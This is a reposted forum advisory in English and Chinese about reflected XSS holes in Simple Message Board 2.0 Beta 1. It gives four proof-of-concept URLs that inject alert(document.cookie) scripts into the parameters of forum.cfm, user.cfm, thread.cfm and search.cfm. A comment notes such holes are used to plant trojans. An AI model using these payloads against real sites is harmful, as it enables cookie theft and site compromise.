[转载]XSS in forums Simple Message Board Version 2.0 Beta 1
文章作者:rUnViRuS信息来源:[url]www.security-arab.com[/url]
xss in forums
Simple Message Board Version 2.0 Beta 1
Powered by Man and Machine, Ltd
Exploit
XSS in forum.cfm
[url]http://www.example.com/forum/forum.cfm?FID=<script>JavaScript:alert[/url](document.cookie);</scrip
t>
XSS in user.cfm
[url]http://www.example.com/forum/user.cfm?UID=<script>JavaScript:alert[/url](document.cookie);</script>
XSS in thread.cfm
[url]http://www.example.com/forum/thread.cfm?TID=<script>JavaScript:alert[/url](document.cookie);</scri
pt>
XSS IN search.cfm
[url]http://www.example.com/forum/search.cfm?PostDate=<script>JavaScript:alert[/url](document.cookie);<
/script> 不是吧~?~老大~~~还要翻译吖~?
Simple Message Board 是俄罗斯的一个小型论坛程序~
在forum.cfm等等页面存在着CSS/XSS跨站脚本漏洞攻击
通常在国内都是用来进行挂马和小破坏~
页:
[1]